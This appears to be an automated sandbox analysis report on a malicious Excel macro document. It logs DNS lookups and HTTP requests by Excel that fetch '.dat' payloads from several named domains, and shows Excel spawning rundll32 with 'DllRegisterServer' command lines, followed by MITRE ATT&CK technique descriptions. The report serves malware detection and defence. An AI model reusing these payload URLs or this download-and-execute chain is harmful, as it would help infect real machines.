Feb 23, 2021 14:19:38.712342024 CET	80	49167	138.36.237.100	192.168.2.22
Feb 23, 2021 14:20:59.880158901 CET	49173	80	192.168.2.22	68.66.216.42
Feb 23, 2021 14:21:00.284838915 CET	49173	80	192.168.2.22	68.66.216.42
Feb 23, 2021 14:21:01.096146107 CET	49173	80	192.168.2.22	68.66.216.42
Feb 23, 2021 14:21:02.703025103 CET	49173	80	192.168.2.22	68.66.216.42
Feb 23, 2021 14:21:05.916909933 CET	49173	80	192.168.2.22	68.66.216.42
Feb 23, 2021 14:21:12.329036951 CET	49173	80	192.168.2.22	68.66.216.42

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 14:18:59.924915075 CET	52197	53	192.168.2.22	8.8.8.8
Feb 23, 2021 14:19:00.094476938 CET	53	52197	8.8.8.8	192.168.2.22
Feb 23, 2021 14:19:00.758764982 CET	53099	53	192.168.2.22	8.8.8.8
Feb 23, 2021 14:19:00.912467003 CET	53	53099	8.8.8.8	192.168.2.22
Feb 23, 2021 14:19:01.824798107 CET	52838	53	192.168.2.22	8.8.8.8
Feb 23, 2021 14:19:02.141855955 CET	53	52838	8.8.8.8	192.168.2.22
Feb 23, 2021 14:19:04.956159115 CET	61200	53	192.168.2.22	8.8.8.8
Feb 23, 2021 14:19:05.008476019 CET	53	61200	8.8.8.8	192.168.2.22
Feb 23, 2021 14:19:05.020178080 CET	49548	53	192.168.2.22	8.8.8.8
Feb 23, 2021 14:19:05.074799061 CET	53	49548	8.8.8.8	192.168.2.22
Feb 23, 2021 14:19:05.283854961 CET	55627	53	192.168.2.22	8.8.8.8
Feb 23, 2021 14:19:05.334481001 CET	53	55627	8.8.8.8	192.168.2.22
Feb 23, 2021 14:19:05.345151901 CET	56009	53	192.168.2.22	8.8.8.8
Feb 23, 2021 14:19:05.396831989 CET	53	56009	8.8.8.8	192.168.2.22
Feb 23, 2021 14:19:05.685358047 CET	61865	53	192.168.2.22	8.8.8.8
Feb 23, 2021 14:19:05.749656916 CET	53	61865	8.8.8.8	192.168.2.22
Feb 23, 2021 14:19:05.762444019 CET	55171	53	192.168.2.22	8.8.8.8
Feb 23, 2021 14:19:05.811254025 CET	53	55171	8.8.8.8	192.168.2.22
Feb 23, 2021 14:19:09.972910881 CET	52496	53	192.168.2.22	8.8.8.8
Feb 23, 2021 14:19:10.174398899 CET	53	52496	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 14:18:59.924915075 CET	192.168.2.22	8.8.8.8	0xb648	Standard query (0)	rzminc.com	A (IP address)	IN (0x0001)
Feb 23, 2021 14:19:00.758764982 CET	192.168.2.22	8.8.8.8	0x5cf2	Standard query (0)	pathinanchilearthmovers.com	A (IP address)	IN (0x0001)
Feb 23, 2021 14:19:01.824798107 CET	192.168.2.22	8.8.8.8	0x71dd	Standard query (0)	jugueterialatorre.com.ar	A (IP address)	IN (0x0001)
Feb 23, 2021 14:19:04.956159115 CET	192.168.2.22	8.8.8.8	0xc229	Standard query (0)	crt.sectigo.com	A (IP address)	IN (0x0001)
Feb 23, 2021 14:19:05.020178080 CET	192.168.2.22	8.8.8.8	0xc6cc	Standard query (0)	crt.sectigo.com	A (IP address)	IN (0x0001)
Feb 23, 2021 14:19:09.972910881 CET	192.168.2.22	8.8.8.8	0xd39	Standard query (0)	biblicalisraeltours.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 23, 2021 14:19:00.094476938 CET	8.8.8.8	192.168.2.22	0xb648	No error (0)	rzminc.com	72.52.227.180	A (IP address)	IN (0x0001)
Feb 23, 2021 14:19:00.912467003 CET	8.8.8.8	192.168.2.22	0x5cf2	No error (0)	pathinanchilearthmovers.com	162.241.80.6	A (IP address)	IN (0x0001)
Feb 23, 2021 14:19:02.141855955 CET	8.8.8.8	192.168.2.22	0x71dd	No error (0)	jugueterialatorre.com.ar	138.36.237.100	A (IP address)	IN (0x0001)
Feb 23, 2021 14:19:05.008476019 CET	8.8.8.8	192.168.2.22	0xc229	No error (0)	crt.sectigo.com	91.199.212.52	A (IP address)	IN (0x0001)
Feb 23, 2021 14:19:05.074799061 CET	8.8.8.8	192.168.2.22	0xc6cc	No error (0)	crt.sectigo.com	91.199.212.52	A (IP address)	IN (0x0001)
Feb 23, 2021 14:19:10.174398899 CET	8.8.8.8	192.168.2.22	0xd39	No error (0)	biblicalisraeltours.com	68.66.216.42	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

rzminc.com

pathinanchilearthmovers.com

jugueterialatorre.com.ar

biblicalisraeltours.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	72.52.227.180	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 14:19:00.274074078 CET	0	OUT	GET /xklyulyijvn/44250596245254600000.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: rzminc.com Connection: Keep-Alive
Feb 23, 2021 14:19:00.738688946 CET	1	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 13:19:00 GMT Server: Apache/2.4.46 (CentOS) X-Powered-By: PHP/7.3.27 Upgrade: h2 Connection: keep-alive, close Cache-Control: private, must-revalidate Expires: Tue, 23 Feb 2021 13:19:00 GMT Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	162.241.80.6	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 14:19:01.075107098 CET	2	OUT	GET /eznwcdhx/44250596245254600000.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: pathinanchilearthmovers.com Connection: Keep-Alive
Feb 23, 2021 14:19:01.803869009 CET	2	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 13:19:01 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Cache-Control: max-age=300 Expires: Tue, 23 Feb 2021 13:24:01 GMT X-Endurance-Cache-Level: 2 Content-Length: 0 Keep-Alive: timeout=5, max=75 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	138.36.237.100	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 14:19:02.431818008 CET	3	OUT	GET /xjzpfwc/44250596245254600000.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: jugueterialatorre.com.ar Connection: Keep-Alive
Feb 23, 2021 14:19:03.712217093 CET	4	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 23 Feb 2021 13:19:02 GMT Server: Apache X-Powered-By: PHP/7.3.20 Set-Cookie: e34c2f879dc85bcd47ed95fb5d2ec3c0=b97d6f1fa425ef50721420a8179aad24; path=/; secure; HttpOnly Expires: Wed, 17 Aug 2005 00:00:00 GMT Last-Modified: Tue, 23 Feb 2021 13:19:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: https://jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
Feb 23, 2021 14:19:03.712284088 CET	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49172	72.52.227.180	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 14:19:09.491547108 CET	92	OUT	GET /fdzgprclatqo/44250596245254600000.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: rzminc.com Connection: Keep-Alive
Feb 23, 2021 14:19:09.955905914 CET	121	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 13:19:09 GMT Server: Apache/2.4.46 (CentOS) X-Powered-By: PHP/7.3.27 Upgrade: h2 Connection: keep-alive, close Cache-Control: private, must-revalidate Expires: Tue, 23 Feb 2021 13:19:09 GMT Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49173	68.66.216.42	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 14:19:10.330482006 CET	122	OUT	GET /otmchxmxeg/44250596245254600000.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: biblicalisraeltours.com Connection: Keep-Alive
Feb 23, 2021 14:19:10.805535078 CET	122	IN	HTTP/1.1 200 OK Connection: Keep-Alive X-Powered-By: PHP/7.4.14 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Tue, 23 Feb 2021 13:19:10 GMT Server: LiteSpeed Strict-Transport-Security: max-age=63072000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: upgrade-insecure-requests X-XSS-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 23, 2021 14:19:04.316070080 CET	138.36.237.100	443	192.168.2.22	49168	CN=jugueterialatorre.com.ar CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Jun 02 02:00:00 CEST 2020 Mon Nov 06 13:23:33 CET 2017	Thu Jun 03 01:59:59 CEST 2021 Sat Nov 06 13:23:33 CET 2027	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Feb 23, 2021 14:19:04.316070080 CET	138.36.237.100	443	192.168.2.22	49168	CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:33 CET 2017	Sat Nov 06 13:23:33 CET 2027		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 920 Parent PID: 584

General

Start time:	14:18:33
Start date:	23/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f3e0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2920 Parent PID: 920

General

Start time:	14:18:46
Start date:	23/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\JDFR.hdfgr,DllRegisterServer
Imagebase:	0xff310000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2944 Parent PID: 920

General

Start time:	14:18:47
Start date:	23/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Imagebase:	0xff310000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2356 Parent PID: 920

General

Start time:	14:18:47
Start date:	23/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Imagebase:	0xff310000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2860 Parent PID: 920

General

Start time:	14:18:47
Start date:	23/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Imagebase:	0xff310000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3040 Parent PID: 920

General

Start time:	14:18:48
Start date:	23/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\JDFR.hdfgr4,DllRegisterServer
Imagebase:	0xff310000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Complaint-447781983-02182021.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Complaint-447781983-02182021.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations